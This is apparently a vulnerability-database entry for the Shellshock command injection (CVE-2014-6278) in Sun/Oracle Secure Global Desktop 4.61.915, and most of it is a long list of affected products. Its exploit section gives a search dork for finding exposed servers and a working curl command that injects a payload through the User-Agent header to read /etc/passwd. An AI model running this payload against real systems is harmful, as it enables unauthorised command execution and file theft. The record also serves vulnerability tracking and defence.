ID
VAR-E-201409-0016
CVE
| cve_id: | CVE-2014-6278 | Trust: 1.0 |
| cve_id: | CVE-2014-6277 | Trust: 0.3 |
EDB ID
39887
TITLE
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock) - CGI webapps Exploit
Trust: 1.0
DESCRIPTION
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock). CVE-2014-6278 . webapps exploit for CGI platform
Trust: 1.0
AFFECTED PRODUCTS
| vendor: | sun | model: | secure global desktop and oracle global desktop | scope: | eq | version: | 4.61.915 | Trust: 1.0 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5 | Trust: 0.6 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7245 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7242 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7238 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7235 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7232 | Trust: 0.3 |
| vendor: | xerox | model: | workcentre | scope: | eq | version: | 7228 | Trust: 0.3 |
| vendor: | xerox | model: | phaser | scope: | eq | version: | 78000 | Trust: 0.3 |
| vendor: | xerox | model: | phaser | scope: | eq | version: | 67000 | Trust: 0.3 |
| vendor: | xerox | model: | colorqube | scope: | eq | version: | 9393 | Trust: 0.3 |
| vendor: | xerox | model: | colorqube | scope: | eq | version: | 9303 | Trust: 0.3 |
| vendor: | xerox | model: | colorqube | scope: | eq | version: | 9302 | Trust: 0.3 |
| vendor: | xerox | model: | colorqube | scope: | eq | version: | 9301 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts i386 | scope: | eq | version: | 12.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux lts amd64 | scope: | eq | version: | 12.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux sparc | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux powerpc | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux i386 | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux arm | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | ubuntu | model: | linux amd64 | scope: | eq | version: | 10.04 | Trust: 0.3 |
| vendor: | sun | model: | solaris | scope: | eq | version: | 11 | Trust: 0.3 |
| vendor: | redhat | model: | enterprise linux | scope: | eq | version: | 5.0 | Trust: 0.3 |
| vendor: | redhat | model: | enterprise linux client | scope: | eq | version: | 5 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux workstation | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux server | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux long life server | scope: | eq | version: | 5.6 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux hpc node | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | red | model: | hat enterprise linux server | scope: | eq | version: | 5 | Trust: 0.3 |
| vendor: | oracle | model: | vm virtualbox | scope: | eq | version: | 3.2 | Trust: 0.3 |
| vendor: | oracle | model: | vm virtualbox | scope: | eq | version: | 3.1 | Trust: 0.3 |
| vendor: | oracle | model: | linux | scope: | eq | version: | 5 | Trust: 0.3 |
| vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6.2 | Trust: 0.3 |
| vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 6 | Trust: 0.3 |
| vendor: | oracle | model: | enterprise linux | scope: | eq | version: | 5 | Trust: 0.3 |
| vendor: | mcafee | model: | email gateway patch | scope: | eq | version: | 7.01 | Trust: 0.3 |
| vendor: | mcafee | model: | email gateway | scope: | eq | version: | 7.0 | Trust: 0.3 |
| vendor: | mcafee | model: | email gateway hotfix | scope: | eq | version: | 6.7.22 | Trust: 0.3 |
| vendor: | mcafee | model: | email gateway hotfix | scope: | eq | version: | 6.7.21 | Trust: 0.3 |
| vendor: | ibm | model: | ds8000 | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | ibm | model: | aix | scope: | eq | version: | 7.1 | Trust: 0.3 |
| vendor: | ibm | model: | aix | scope: | eq | version: | 6.1 | Trust: 0.3 |
| vendor: | ibm | model: | aix | scope: | eq | version: | 5.3 | Trust: 0.3 |
| vendor: | hp | model: | insight control | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.1.4 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.0.16 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 4.2 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 4.1 | Trust: 0.3 |
| vendor: | gnu | model: | bash rc1 | scope: | eq | version: | 4.0 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 4.0 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.2.48 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.2 | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.00.0(2) | Trust: 0.3 |
| vendor: | gnu | model: | bash | scope: | eq | version: | 3.0 | Trust: 0.3 |
| vendor: | gentoo | model: | linux | scope: | - | version: | - | Trust: 0.3 |
| vendor: | cosmicperl | model: | directory pro | scope: | eq | version: | 10.0.3 | Trust: 0.3 |
| vendor: | cisco | model: | wide area application services | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | unified ip phone | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | unified contact center express | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | network analysis module | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | mds | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | gss 4492r global site selector | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | emergency responder | scope: | eq | version: | 1.1 | Trust: 0.3 |
| vendor: | cisco | model: | digital media manager | scope: | eq | version: | 5.0 | Trust: 0.3 |
| vendor: | cisco | model: | digital media manager | scope: | eq | version: | 0 | Trust: 0.3 |
| vendor: | cisco | model: | show and share | scope: | eq | version: | 5(2) | Trust: 0.3 |
| vendor: | avaya | model: | ip deskphone | scope: | eq | version: | 96x16.2 | Trust: 0.3 |
| vendor: | avaya | model: | ip deskphone | scope: | eq | version: | 96x16 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.5.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.11 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.10 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.9 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.9 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.8 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.7 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.6 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.5 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.03 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.0 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.4 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.3 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.2 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.7.1 | Trust: 0.3 |
| vendor: | apple | model: | mac os | scope: | eq | version: | x10.6 | Trust: 0.3 |
EXPLOIT
# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: lastc0de@outlook.com
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux
VULNERABLE FILE
http://target.com//tarantella/cgi-bin/modules.cgi
POC :
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt
localhost@~#cat xixixi.txt
which will print out the content of /etc/passwd file.
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 1.0
PRICE
free
Trust: 1.0
TYPE
Command Injection (Shellshock)
Trust: 1.0
CREDITS
lastc0de
Trust: 1.0
EXTERNAL IDS
| db: | NVD | id: | CVE-2014-6278 | Trust: 1.0 |
| db: | EXPLOIT-DB | id: | 39887 | Trust: 1.0 |
| db: | NVD | id: | CVE-2014-6277 | Trust: 0.3 |
| db: | BID | id: | 70165 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-6278 | Trust: 1.0 |
| url: | http://www.gnu.org/software/bash/ | Trust: 0.3 |
SOURCES
| db: | BID | id: | 70165 |
| db: | EXPLOIT-DB | id: | 39887 |
LAST UPDATE DATE
2023-05-30T10:41:05.977000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 70165 | date: | 2015-10-26T16:51:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 70165 | date: | 2014-09-27T00:00:00 |
| db: | EXPLOIT-DB | id: | 39887 | date: | 2016-06-06T00:00:00 |